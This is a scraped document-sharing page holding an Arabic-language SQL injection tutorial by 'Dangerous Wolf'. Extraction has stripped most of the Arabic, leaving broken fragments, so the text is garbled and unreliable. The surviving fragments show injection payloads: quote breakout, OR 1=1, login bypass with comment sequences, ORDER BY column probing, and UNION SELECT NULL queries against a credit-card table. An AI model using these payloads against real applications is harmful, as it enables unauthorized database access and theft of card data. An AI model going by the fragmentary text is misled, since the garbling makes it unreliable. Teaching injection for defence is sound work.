sql injection wolf

Download SQL Injection Wolf

Post on 11-Jun-2015

397 views

Category:

Documents

7 download

Embed Size (px)

TRANSCRIPT

Structured Query Language Injection

SQL Injection TutorialSecond ReleaseBy Dangerous Wolf

: 0002 . 0002 . . 0202 . . . ) ( Tutorial SQL Injection . 003 . 001 . . 01 SQL Injection . . Injection . : "James Marshall The top admin of "Astalavista Security Committee Adrian Lamo "H4G1S Destroying Group" Became WhiteHat "Zinho The top admin of "Hackers Center Committee "Steve Example Gold Member of "Unix Wizard "IDESpinner The top admin of "Cracking Is Life cracking- Team Ali Rashidi The top admin of "Crouz Security Team

77 Page 1 of

) ( SQL Injection Tutorial by Dangerous Wolf

1: Web Application Dynamic Content windowing . . Platform ) SQL (Web Data Store Web Application (front-end-scripts) front-end SQL Query . web application hijacking . Query front-end scripts application . SQL Injection ! Database . Database Servers . ) (CC Info . Microsoft SQL MSSQL ) result ( (Oracle DB Servers) Oracle . MSSQL ) (Market Oracle !! Oracle . )!!( bug !

77 Page 2 of

) ( SQL Injection Tutorial by Dangerous Wolf

2: SQL Injection . . application ) ( ) ( SQL .

. Web Application . Web Server ) ! (exception exception '500: Internal Server 'Error SQL syntax ) : quote ( application . exception . text HTML replace. / . redirect . (application code) application . Application . )002( redirect Internal Server Error replace. : application A B . application proddetails.asp . ProdID . ) (returned . application proddetails.asp ProdID valid. Application A . ProdID ID insert recordset .77 Page 3 of ) ( SQL Injection Tutorial by Dangerous Wolf

Application A recordset exception ' '500: Internal Server Error . Application B recordset 0 . ' 'No such Product . . SQL Injection . invalid application )!!!( SQL .

Application . SQL Injection : SQL SQL Keyword : OR, AND ... . META Character ; ' !! . Intercepting Proxy redirect . . SQL Injection. valid . injection . . SQL Injection exploit. SQL . pick of litter )!!!( SQL Injection .

SQL Injection SQL . SQL Number String Date . Injection . web application SQL Query )' 'abc String 4 number string (. SQL quote . : 4 = SELECT * FROM Products WHERE ProdID

77 Page 4 of

) ( SQL Injection Tutorial by Dangerous Wolf

'SELECT * FROM Products WHERE ProdName = 'Book SQL Server . SQL . Basic Arithmetic Operation . : 4=/myecommercesite/proddetails.asp?ProdID SQL Injection . '4 . 1 + 3 . SQL . SQL : '4 = (1) SELECT * FROM Products WHERE ProdID 1 + 3 = (2) SELECT * FROM Products WHERE ProdID SQL . ) ProdID 4( SQL Injection . SQL SQL Syntax String Expression . . quote breaking out quote . SQL Server ) (concatenation . Microsoft SQL Server + Oracle || . . : /myecommercesite/proddetails.asp?ProdName=Book SQL Injection ProdName . ' B B' + 'ook ) B' || 'ook .(Oracle : ''(1) SELECT * FROM Products WHERE ProdName = 'Book '(2) SELECT * FROM Products WHERE ProdID = 'B' + 'ook SQL ) (book Book. . ) sysdate Oracle SQL Server )( getdate (. SQL

77 Page 5 of

) ( SQL Injection Tutorial by Dangerous Wolf

SQL Injection .

. syntax .

Syntax SQL ) (Blindfolded . . . . SELECT WHERE WHERE . WHERE )( . application 1=1 OR . . . application SQL ) : 1=1 OR 0001 application (. WHERE ,OR AND . : '2=1 'AND . '2=1 'OR .Operator Precedence WHERE . UNION SELECT WHERE . SQL . . 2=1 AND, OR 1=1 SQL . )--( SQL Server ) .(Ignore User Name Password . : SELECT Username, UserID, Password FROM Users WHERE Username = user AND Password = pass --' johndoe ) (User WHERE : WHERE Username = johndoe --'AND Password = pass

77 Page 6 of

) ( SQL Injection Tutorial by Dangerous Wolf

) .(bypass WHERE : )WHERE (Username = user AND Password = pass . )-- ' (jonhdoe : )WHERE (Username = johndoe' --' AND Password = pass . . ) (comment . .

SQL . ) ( . . Oracle Microsoft SQL Server . . . WHERE . : 'AND 'xxx' = 'x' + 'xx + || Oracle MS SQL . ; . SQL ; SQL . SQL Injection Driver Oracle ; . comment ) ( ; MS SQL Oracle . ; COMMIT ) : -- .(xxx' : COMMIT . . ) :

)( getdate MS SQL sysdate Oracle

77 Page 7 of

) ( SQL Injection Tutorial by Dangerous Wolf

. SQL Injection . UNION SELECT .

UNION SELECT SELECT WHERE application . UNION SELECT . WHERE UNION SELECT . UNION SELECT . . . . UNION SELECT UNION ) (. UNION SELECT . UNION SELECT . .

UNION SELECT SQL Injection . UNION SELECT ) (. Column Number Mismatch Column Type Mismatch . . . ORDER BY . ORDER BY SELECT record-set . sort . ** . - 11223344) ORDER BY CCNum :SELECT CCNum FROM CreditCards - WHERE (AccNum=11223344) ORDER BY CCNumAND CardState=Active) AND UserName=johndoe

77 Page 8 of

) ( SQL Injection Tutorial by Dangerous Wolf

ORDER BY . . 1 11223344) ORDER BY . CCNum . -- 2 11223344) ORDER BY . ORDER BY . 1 ORDER BY . SELECT . . ) sort application. ASC DESC (. ORDERY BY 1 001 ) 0001 (. . . . ) . (. .

. . . Brute Force . . : : 01 013 ) 00006 ( . 02 1 . . NULL Keyword SQL . ) ( NULL . UNION SELECT NULL . : SELECT CCNum,CCType,CCExp,CCName FROM CreditCards )WHERE (AccNum=11223344 AND CardState=Active AND UserName=johndoe

77 Page 9 of

) ( SQL Injection Tutorial by Dangerous Wolf

CCNum . . ) 4 ( UNION NULL FROM Permission Error ) ) (Permission Issues handle (. MS SQL FROM . Oracle DUAL . WHERE ) : 2=1 (WHERE record-set ) (NULL ) application NULL (. MS SQL Server Oracle : 2=1 11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE : SELECT CCNum,CCType,CCExp,CCName FROM CreditCards WHERE (AccNum=11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 --AND CardState=Active) AND UserName=johndoe NULL . UNION . UNION . UNION 001 ) - ) (Vendor-Specific Table Name .(FROM UNION NULL .